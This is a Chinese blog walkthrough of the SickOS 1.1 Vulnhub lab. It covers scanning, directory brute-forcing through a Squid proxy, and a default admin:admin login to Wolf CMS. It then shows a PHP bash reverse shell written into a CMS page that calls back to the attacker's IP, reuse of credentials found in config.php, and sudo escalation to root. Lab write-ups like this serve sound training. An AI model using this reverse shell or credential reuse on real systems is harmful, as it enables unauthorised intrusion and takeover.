sickos1.1靶机攻略

已于 2023-10-13 14:43:43 修改
阅读量102 收藏
点赞数
分类专栏: 靶机系列 文章标签: 学习方法 安全 网络安全 web安全 安全威胁分析 笔记
于 2023-10-13 14:08:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/133809372
版权

sickos

扫描阶段

传统两件套扫描

arp-scan -l

nmap -sV -A -p- 10.4.7.134

结果如图

image-20231012220649028

开放22ssh,3128tcp 关闭8080

挨个尝试访问,只有3128端口有个错误页

image-20231012220752380

重新查看3128的扫描结果

3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved

上网查询该squid服务为代理服务

在man命令下的帮助下即可进行目录扫描了

dirsearch -u http://10.4.7.134 --proxy http://10.4.7.134:3128

dirb http://10.4.7.134 -p http://10.4.7.134:3128

image-20231012222023932

image-20231012222033560

二者扫描结果如图,尝试进行访问

渗透

如图添加代理

image-20231012223125658
在这里插入图片描述

再次访问主页,发现内容

在这里插入图片描述

发现没用,接着探查

image-20231012223306548

发现内容/wolfcms,尝试访问

image-20231012223705396

上网搜索一波相关内容,甚至发现了相关cve

image-20231013143909206

在这里插入图片描述

发现admin后台页进入

http://10.4.7.134/wolfcms/?/admin/login

image-20231012224954775

至此处毫无有效信息,只能盲猜传统密码了

最后发现账号密码都为admin

admin:admin

image-20231012225323434

探查一番发现文件上传地方,此处上传个小马

但是发现没法执行该php文件,只能换个方式

此处将小马的内容写进其中一页里面去

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.4.7.130/12138 0>&1'"); ?>

image-20231012225833964

发现在这写弹不进去,再换一个地方写

image-20231012230131574

保存过后点击放大镜便执行了小马

成功反弹进去

image-20231012230317881

进去过后unmae -a,whoami,id,sudo -l,find都试了试没啥用,最后看看文件里有啥东西,结果发现当前目录下有config.php文件

image-20231013112639913

查看发现账号信息

image-20231013112750659

root
john@123

image-20231013115616263

查看passwd文件看看有哪些用户,此处发现和root一样是/bin/bash的有两个,但是考虑www-data也可以登录,所有/bin/sh的也考虑尝试

经过尝试发现sickos可以登录ssh

image-20231013140216448

提权

id可以发现该用户可以用sudo命令

随后使用sudo提权成功

sudo -l
sudo su root

image-20231013140329610

order libra
关注
专栏目录
Vulnhub靶机系列:SickOs: 1.1
汗的博客
04-19 1223
这次的靶机是Vulnhub靶机靶机地址及相关描述 靶机设置 利用知识及工具 信息收集并getshell 提权 总结
Vulnhub系列-sick0s1.1
Yasso的博客
01-01 3489
靶机:192.168.12.130 kali: 192.168.249.128 一、信息收集 nmap -sV 192.168.12.130 –扫描开放端口 3128端口是作为代理 dirsearch -u http://192.168.12.130 --proxy=192.168.12.130:3128 –扫下web目录 扫到robots.txt Wolf CMS 后台管理:?/admin 一试就出来了–弱口令:admin/admin Wolfcms 0.8.2中存在任意文件上传漏洞 weevely是适用
SickOs1.1靶机
2301_80203701的博客
12-11 281
但是又没开放3306端口利用不了,万一别的用户也可以用这个密码登录呢,那就看看所有的用户。打开了,随便点点看。刚开始无意的输入一个弱口令就进去,账号:admin 密码:admin。也没扫出来什么有用的端口,但是该进行的扫描是必须要进行的,万一哪次就是突破口呢。可以看到开放了 22,3128,8080端口。爆出来个Dos,一般的渗透测试中不用这种损人的漏洞。这个可以执行,php代码,那就开始反弹shell吧,有个wolfcms,记着,接着访问login页面。有点乱,看看有什么可以执行的命令打开这个文件。
VulnHub-SickOs1.1靶机笔记
LINGX5的博客
09-28 1105
通过nmap扫描发现了squid代理服务,设置代理做目录爆破发现了wolfcms,利用google搜索找到了它的后台管理页面,通过弱口令成功登陆进入后台管理页面利用后台的上传文件功能,上传php脚本成功获得了立足点,在该网站翻找配置信息,找了几组凭证,尝试口令服用,获得了sickos用户的权限,进而提权到了root。
SickOs1.1--靶机实操详解
qq_61802750的博客
08-05 418
所以我们要去找到它的管理员路径。这个系统没有做多少的自定义的功能,还是老旧的系统,我们可以通过:1.猜测;这样的话我们有理由去推测:整个系统就是administertor,所以我们能不能找到它的凭据,从而利用它的身份。这样我们就得到了一个root用户,但我们无法得出是22端口的ssh用户还是3128端口的用户。打开浏览器,对3128端口和8080端口进行访问,虽然说8080端口是关闭的,但我们还是要进行尝试。好了,我们看到了wolfcms的这么一个内容管理系统,那么在这个系统中,artcles中,有。
红队靶机渗透-SickOS1.1
m0_57967573的博客
04-29 693
主机发现之后,分别用nmap的TCP和UDP扫描发现三个端口,8080存疑,未开放端口,3128是一个squid代理服务器,22 SSH端口 8080无法访问;3128提示报错信息,目录爆破也没有任何信息,由于它是代理服务器,因此以3128端口做代理进行目录扫描,得到了新的有价值web目录 通过在浏览器上把3128设置为代理服务器,访问到了靶机web页面,看到了wolfcms内容管理系统······
Vulhub sickos1.1靶机
小小猪的博客
06-11 199
Vulhub sickos1.1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.237 设置代理 访问http://x.x.x.237/robots.txt 访问/wolfcms目录 发现存在CMS。。。那么管理员界面呢? 发现files 面板下的权限 上传木马 访问http://x.x.x.237/wolfcms/public/shell.php,进行反弹 查看一下:$ cat /var/www/wolfcm.
OSCP Sickos 1.1 靶机渗透
Shadow的博客
03-23 347
Sickos 1.1 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-03-23 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 Sickos 1.1主机ip为172.16.1.10 nmap 扫描一下 nmap -p- -A 172.16.1.10 主机开放了代理服务器,
【学渗透靶机——sickOS1.1】
jieli0901227的博客
04-12 131
从服务器信息收集看 这台靶机的ip为192.168.241.150 ,服务器开放了22,3128、8080使用nmap扫描漏洞也么什么发现,。对于开放的端口我们优先8080和3128。
SickOs1.1靶机渗透流程
RemedyVI的博客
07-10 224
信息收集发现22,3128端口开放,并且3128端口是代理端口,需要用代理端口进行访问,目录扫描,发现是wolfcms以后利用wolfcms的文件上传漏洞获取反弹shell,寻找wolfcms的config获取数据库的登录账户和密码,利用这个密码和sickos的登录密码一样登录靶机,sickos拥有sudo的所有权限可直接切换到root用户。总的来说这个靶机关键是需要用代理,如果不知道的话就办法继续进行下去,以及猜测密码。
红队渗透靶场之SickOs1.1
xf555er的博客
12-06 1141
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
靶机渗透SickOs1.2(非常详细,适合新手渗透)
君莫hacker的博客
09-08 7340
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
【vulnhub】SickOs1.2 靶机
Nicky_Zheng的博客
01-29 591
1、 信息收集 1.1、主机发现 使用netdiscover扫描靶机ip kali@kali:~$ sudo netdiscover -i eth1 6 Captured ARP Req/Rep packets, from 3 hosts. Total size: 360 _____________________________________________________________________________ IP At M
【vulnhub】---SickOS1.2靶机
qq_43168364的博客
08-22 469
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 命令:masscan --rate=10000 --ports 0-65535 19
【大语言模型】ACL2024论文-16 基于地图制图的罗马尼亚自然语言推理语料库的新型课程学习方法
11-18 840
本文的主要贡献是介绍了第一个公开的罗马尼亚语自然语言推理(NLI)语料库RoNLI,它包含58K训练句子对和6K验证及测试句子对。这些句子对通过远程监督获取和手动标注得到正确的标签。文章还提出了一种基于数据制图的新型课程学习策略,通过该策略改进了最佳模型。数据集和复现基线的代码已在GitHub上公开。
零基础学安全--shell脚本学习(1)脚本创建执行及变量使用
qq_66164763的博客
11-24 801
Shell又称命令解释器,它能识别用户输入的各种命令,并传递给操作系统。它的作用类似于Windows操作系统中的命令行,但是,Shell的功能远比命令行强大的多。在UNIX或者localhost中,Shell既是用户交互的界面,也是控制系定义:变量名=变量内容使用:$变量名(一般来说这里加不加引号效果是相同的,但是如果你在引用变量时加''就会直接把这个$变量名当作字符串输出,相当于一个转义字符)双引号和花括号括起来可以进行字符串的拼接。
零基础学安全--HTML
qq_66164763的博客
11-24 379
是用于创建网页和网页应用的标准标记语言。它使用一系列标签(tags)来描述网页的内容和结构。
Springboot组合SpringSecurity安全插件基于密码的验证Demo
最新发布
yrldjsbk的博客
11-26 96
下面的案例,都是基于数据库mysql,用户密码,验证登录的策略demo。WebSecurityConfigurerAdapter,这个有提示,说该抽象类已经被弃用。如图,这个接口需要带一个参数,username。我使用的是Apifox接口管理软件。4:创建一个测试控制器HelloController.测试一下效果。)类的名字你可以自己定义,但是必须实现这个插件的接口才行。2:增加配置类,配置基础的参数信息。引入maven仓库的坐标。3:需要创建一个实现了接口。
医疗数据质量安全,数据安全解决方案,医院关心的数据安全问题,信息安全方案(Word原件)
2301_79994950的博客
11-26 219
3.4.2网络可信接入 3.4.3应用身份识别 3.4.4抵御SQL注入 3.4.5虚拟补丁防护 3.4.6阻断漏洞攻击
vulnhub靶机系列:
09-09
3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值